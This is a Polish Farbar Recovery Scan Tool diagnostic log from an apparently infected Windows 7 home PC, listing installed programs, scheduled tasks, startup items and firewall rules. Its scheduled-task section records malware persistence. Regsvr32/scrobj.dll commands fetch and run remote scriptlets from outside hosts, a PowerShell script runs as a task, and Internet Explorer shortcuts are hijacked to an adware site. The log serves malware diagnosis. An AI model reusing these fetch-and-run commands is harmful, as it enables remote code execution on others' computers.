Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 05-05-2017 01 Uruchomiony przez Krzysiek (05-05-2017 16:19:22) Uruchomiony z C:\Users\Krzysiek\Desktop Windows 7 Professional Service Pack 1 (X64) (2015-10-09 16:15:23) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-3505958818-441980298-1533990010-500 - Administrator - Disabled) Gość (S-1-5-21-3505958818-441980298-1533990010-501 - Limited - Disabled) Krzysiek (S-1-5-21-3505958818-441980298-1533990010-1000 - Administrator - Enabled) => C:\Users\Krzysiek ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Bitdefender Ochrona antywirusowa (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371} AS: Bitdefender Moduł antyszpiegowski (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.221 - Adobe Systems Incorporated) Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated) Adobe Photoshop Lightroom 5.4 64-bit (HKLM\...\{558B5965-CC1B-4AF1-BA07-5D6832404050}) (Version: 5.4.0 - Adobe Systems Incorporated) Aktualizacje NVIDIA 2.11.4.125 (Version: 2.11.4.125 - NVIDIA Corporation) Hidden Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.976 - Bitdefender) Bitdefender Antivirus Plus 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender) BitRaider Streaming Client (HKLM-x32\...\BitRaider Streaming Client) (Version: 1.3.3.4098 - BitRaider, LLC) CCleaner (HKLM\...\CCleaner) (Version: 5.14 - Piriform) CPUID HWMonitor 1.28 (HKLM\...\CPUID HWMonitor_is1) (Version: - ) Game Launcher (HKU\S-1-5-21-3505958818-441980298-1533990010-1000\...\Game Launcher) (Version: 12345.0.0.0 - Splitscreen Studios GmbH) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.96 - Google Inc.) Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google) Google SketchUp 8 (HKLM-x32\...\{69167B67-2AD1-4BF0-8AE3-987E98A7823E}) (Version: 3.0.4995 - Google, Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3540 - Intel Corporation) IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.42 - Irfan Skiljan) Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.14 - Oracle Corporation) LEGO®Star Wars™ III The Clone Wars™ (HKLM-x32\...\{208432AC-ED50-4FAE-A37F-5AA83ACF3066}) (Version: 1.00.0000 - LucasArts) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation) Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google) NVIDIA GeForce Experience 2.11.4.125 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.125 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 342.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 342.00 - NVIDIA Corporation) NVIDIA Sterownik graficzny 342.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 342.00 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation) OpenOffice 4.1.1 (HKLM-x32\...\{B5373BA3-BAD7-4EAC-A9D2-B66B41B82C57}) (Version: 4.11.9775 - Apache Software Foundation) Panel sterowania NVIDIA 342.00 (Version: 342.00 - NVIDIA Corporation) Hidden PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden Polski pakiet językowy dla programu Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile PLK Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Polski pakiet językowy dla programu Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended PLK Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Rayman Origins (HKLM-x32\...\{DE491AB9-1D47-4FED-A8F5-4D4325B2EB4B}) (Version: 1.00 - Ubisoft) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.99.311.2016 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7200 - Realtek Semiconductor Corp.) ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation) SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 2.11.4.125 - NVIDIA Corporation) Hidden Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation) Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.) SNS-HDR Lite 2.1.1 (HKLM\...\snshdrlite2_is1) (Version: - Sebastian Nibisz) Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Stronghold Crusader Extreme (HKLM-x32\...\{8C3727F2-8E37-49E4-820C-03B1677F53B6}) (Version: 1.20.0000 - Firefly Studios) Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.52a - Ghisler Software GmbH) Unity Web Player (HKU\S-1-5-21-3505958818-441980298-1533990010-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS) Unity Web Player (x64) (All users) (HKLM\...\UnityWebPlayer) (Version: 4.6.6f2 - Unity Technologies ApS) Watermark Software 8.1 (HKLM-x32\...\Watermark Software) (Version: 8.1 - watermark-software.com) WinRAR 5.21 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) World of Tanks (HKU\S-1-5-21-3505958818-441980298-1533990010-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-3505958818-441980298-1533990010-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {07F80333-721B-421C-ACF2-E9985432E4C9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-13] (Google Inc.) Task: {08CBE3EC-581B-41DB-8C15-DEAF1CD31DF3} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MTF1FdH1MdQLNWQYRjI5OYJYRjk1FjM3FjH4RWM8MH== scrobj.dll Task: {2054E8F0-1C3C-466C-A211-FC1E86C1D961} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {2DB54C5E-CFCB-4AED-8CC0-B31205B240AD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-13] (Google Inc.) Task: {4A7D5165-FE2E-45CB-A97D-3A12EA6C68CF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-03] (Adobe Systems Incorporated) Task: {8EFCEF48-577F-466B-974E-8E7D6D22CB12} - System32\Tasks\{D7E22C9F-3EB5-4229-9E9C-C82BDA34B537} => pcalua.exe -a G:\SetupWizard.exe -d G:\ Task: {971050B6-5969-4AE7-ADCB-3D0BE9C69F2C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-01-15] (Piriform Ltd) Task: {B6854160-3FA1-4C89-BD46-7BF6C0210DDB} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MTF1FdH1MdQLNWQYRjI5OYJYRjk1FjM3FjH4RWM8MH== scrobj.dll Task: {DBD49070-A678-4581-BC65-86FD1D3E2D3B} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA Task: {F09DC3EF-D396-4D12-B8DC-3830837D9292} - System32\Tasks\{66DA0D85-DD1A-4762-B8F1-E10C8B0F2C0C} => pcalua.exe -a "C:\Users\Krzysiek\Desktop\[1.7.10]FiveNightsAtFreddies 1.1.7Installer.exe" -d C:\Users\Krzysiek\Desktop Task: {FE8ECD7F-8781-4BE2-BA64-120847E10F3B} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\Krzysiek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493741443&z=e25a24cbfa502918fd19bf0gez2t7camdz4gcz4zaw&from=ypid&uid=WDCXWD5000AADS-00S9B0_WD-WCAV9505070050700 ShortcutWithArgument: C:\Users\Krzysiek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493741443&z=e25a24cbfa502918fd19bf0gez2t7camdz4gcz4zaw&from=ypid&uid=WDCXWD5000AADS-00S9B0_WD-WCAV9505070050700 ShortcutWithArgument: C:\Users\Krzysiek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493741443&z=e25a24cbfa502918fd19bf0gez2t7camdz4gcz4zaw&from=ypid&uid=WDCXWD5000AADS-00S9B0_WD-WCAV9505070050700 ShortcutWithArgument: C:\Users\Krzysiek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493741443&z=e25a24cbfa502918fd19bf0gez2t7camdz4gcz4zaw&from=ypid&uid=WDCXWD5000AADS-00S9B0_WD-WCAV9505070050700 ==================== Załadowane moduły (filtrowane) ============== 2017-04-24 19:35 - 2017-04-24 19:35 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll 2017-02-08 17:29 - 2017-02-08 17:29 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl 2017-02-08 17:29 - 2017-02-08 17:29 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl 2017-02-08 17:29 - 2017-02-08 17:29 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl 2017-02-08 17:29 - 2017-02-08 17:29 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl 2017-05-02 18:25 - 2017-05-02 18:25 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\pl-pl\bdsystray.txtui 2017-05-04 17:34 - 2017-05-02 03:03 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.96\libglesv2.dll 2017-05-04 17:34 - 2017-05-02 03:03 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.96\libegl.dll 2017-05-04 11:36 - 2017-05-02 08:44 - 00323584 _____ () C:\Users\Krzysiek\AppData\Local\background_fault\bf.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns1 [5] AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns2 [5] AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns3 [5] AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns4 [5] AlternateDataStreams: C:\Users\Krzysiek\Desktop\FRST64.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Desktop\google-sketchup-8-es-en-win.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\ChromeSetup.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\Helicon-Focus-58048-AsystentPobierania.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\HijackThis.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\JRT (1).exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\Niepotwierdzony 587115.crdownload:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\Niepotwierdzony 651273.crdownload:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\ON1_Photo_RAW_2017.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\readerdc_pl_xa_cra_install.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\SkypeSetupFull.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\Spybot-Search-Destroy-12546-AsystentPobierania.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\SpywareTerminatorSetup.exe:BDU [0] AlternateDataStreams: C:\Users\Krzysiek\Downloads\TeamViewer_Setup_pl.exe:BDU [0] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2017-02-03 22:43 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-3505958818-441980298-1533990010-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Krzysiek\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.1.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) mpsdrv => Usługa "Zapora systemu Windows" nie jest uruchomiona. MpsSvc => Usługa "Zapora systemu Windows" nie jest uruchomiona. ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\Services: AdobeARMservice => 2 MSCONFIG\Services: AxAutoMntSrv => 2 MSCONFIG\Services: BRSptStub => 3 MSCONFIG\Services: bthserv => 3 MSCONFIG\Services: c2cautoupdatesvc => 2 MSCONFIG\Services: c2cpnrsvc => 2 MSCONFIG\Services: ehSched => 3 MSCONFIG\Services: Fax => 3 MSCONFIG\Services: FirefoxU => 2 MSCONFIG\Services: GfExperienceService => 2 MSCONFIG\Services: gupdate => 2 MSCONFIG\Services: gupdatem => 3 MSCONFIG\Services: HomeGroupListener => 3 MSCONFIG\Services: HomeGroupProvider => 3 MSCONFIG\Services: igfxCUIService1.0.0.0 => 2 MSCONFIG\Services: MozillaMaintenance => 3 MSCONFIG\Services: MpsSvc => 2 MSCONFIG\Services: NovaSkinResourcepack => 2 MSCONFIG\Services: NvNetworkService => 2 MSCONFIG\Services: NvStreamNetworkSvc => 3 MSCONFIG\Services: NvStreamSvc => 2 MSCONFIG\Services: nvsvc => 2 MSCONFIG\Services: RasAuto => 3 MSCONFIG\Services: RasMan => 3 MSCONFIG\Services: SDScannerService => 2 MSCONFIG\Services: SDUpdateService => 2 MSCONFIG\Services: SDWSCService => 2 MSCONFIG\Services: SkypeUpdate => 2 MSCONFIG\Services: Spooler => 2 MSCONFIG\Services: SSSvc => 2 MSCONFIG\Services: Steam Client Service => 3 MSCONFIG\Services: Stereo Service => 2 MSCONFIG\Services: SwitchBoard => 3 MSCONFIG\Services: TabletInputService => 3 MSCONFIG\Services: TeamViewer => 2 MSCONFIG\Services: vds => 3 MSCONFIG\Services: WbioSrvc => 3 MSCONFIG\Services: WinDefend => 3 MSCONFIG\Services: WMPNetworkSvc => 3 MSCONFIG\Services: wuauserv => 2 MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin MSCONFIG\startupreg: AlcoholAutomount => "C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe" -automount MSCONFIG\startupreg: background_fault => "C:\Users\Krzysiek\AppData\Local\background_fault\aswRD.exe" "C:\Users\Krzysiek\AppData\Local\background_fault\bf.dll",background_fault_collector MSCONFIG\startupreg: BingSvc => C:\Users\Krzysiek\AppData\Local\Microsoft\BingSvc\BingSvc.exe MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR MSCONFIG\startupreg: Gaijin.Net Agent => "C:\Users\Krzysiek\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe" MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe" MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe" MSCONFIG\startupreg: ShadowPlay => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe" MSCONFIG\startupreg: Steam => "D:\Gry\7 days to die\steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{E429B494-6636-4280-8E68-723FC0E0521C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{9CC4F558-CA38-4BEA-99A2-FF1255DDEDBF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E119545F-E54D-4ED6-B66B-64DB0AD771F1}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe FirewallRules: [{F4E946CB-91BB-4EB6-A95E-74912CCF66BB}] => (Allow) C:\Games\World_of_Tanks\WorldofTanks.exe FirewallRules: [{66963264-837B-4C2E-8DEF-2325AE249C81}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{E192C37D-D17C-4A3F-8A4F-A031DAD3BA15}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{6706CFF3-CC6E-4D63-88DF-D5D854EB8017}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{74DA6B5A-3434-4BE1-94B1-82DB2FA54EFF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{B6A572B6-C0A7-4504-80CF-07B5879566E7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{0774026D-50CC-4412-AD4D-2DCD4447A9A6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{9A216DDF-0D99-465D-9042-FC4F0DD656C3}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{DB6AE76D-2244-4BEC-A2CE-CB5442D2AD2D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{891D989C-1FC5-476F-B68A-43E9901B8854}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{E852EF90-004C-4564-B32D-CA27F837D2AE}] => (Allow) D:\Gry\WarThunder\launcher.exe FirewallRules: [{1EAB39BB-C829-463C-9928-D24C703E6A98}] => (Allow) D:\Gry\WarThunder\launcher.exe FirewallRules: [{9FBB5B17-F5E9-40CB-A918-8D99F919B3F2}] => (Allow) LPort=80 FirewallRules: [{614F732A-BAE0-4CCB-AA6F-A5F2868D285A}] => (Allow) LPort=443 FirewallRules: [{BC24B8DD-2906-47A4-9079-5F50C5407B61}] => (Allow) LPort=20010 FirewallRules: [{E3693B70-A183-4898-9F2E-4F76496ED967}] => (Allow) LPort=3478 FirewallRules: [{B355A43A-6F30-4DE0-A9CA-869CF938E6C2}] => (Allow) LPort=7850 FirewallRules: [{FC588505-9AC4-4B7A-87BF-CC518BB19F3F}] => (Allow) LPort=7852 FirewallRules: [{EADE3E5B-EC07-490D-958A-38F88F834442}] => (Allow) LPort=7853 FirewallRules: [{EBAC94EC-559E-47B2-94DD-079399873F82}] => (Allow) LPort=27022 FirewallRules: [{F2593666-F9F8-4D1F-9AF3-6FE383E6E4E2}] => (Allow) LPort=6881 FirewallRules: [{CDFA4AB5-E158-44D2-AEEE-58BA61013DCD}] => (Allow) LPort=33333 FirewallRules: [{DD094746-4D0F-4D12-AE96-C7FBB5E894F0}] => (Allow) LPort=20443 FirewallRules: [{4257289F-AF25-4218-BB7B-3713347701B2}] => (Allow) LPort=8090 FirewallRules: [{AA34F42A-38A1-4180-AA8A-9ED09462C95A}] => (Allow) C:\Program Files (x86)\Ubisoft\Rayman Origins\Rayman Origins.exe FirewallRules: [{369D5488-F712-409F-9F94-AB545E160118}] => (Allow) C:\Program Files (x86)\Ubisoft\Rayman Origins\Rayman Origins.exe FirewallRules: [{39EDFD07-8933-4F68-BC63-962D4512AC1C}] => (Allow) C:\Program Files (x86)\Ubisoft\Rayman Origins\gu.exe FirewallRules: [{C97783F0-44EB-4009-95E8-7B94D354AFBC}] => (Allow) C:\Program Files (x86)\Ubisoft\Rayman Origins\gu.exe FirewallRules: [{FFF77FBB-90AD-4EA9-A07F-2CC719430D21}] => (Allow) D:\Gry\WarThunder\bpreport.exe FirewallRules: [{885AEFD3-D0B7-4020-AECC-FC41FCEE57C8}] => (Allow) D:\Gry\WarThunder\bpreport.exe ==================== Punkty Przywracania systemu ========================= 05-05-2017 13:08:05 Removed AlphaGo 05-05-2017 13:10:25 Removed Stronghold Crusader Extreme 05-05-2017 13:46:07 Removed AlphaGo Sprawdź usługę "winmgmt" lub napraw WMI. ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Kontroler PCI Simple Communications Description: Kontroler PCI Simple Communications Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== 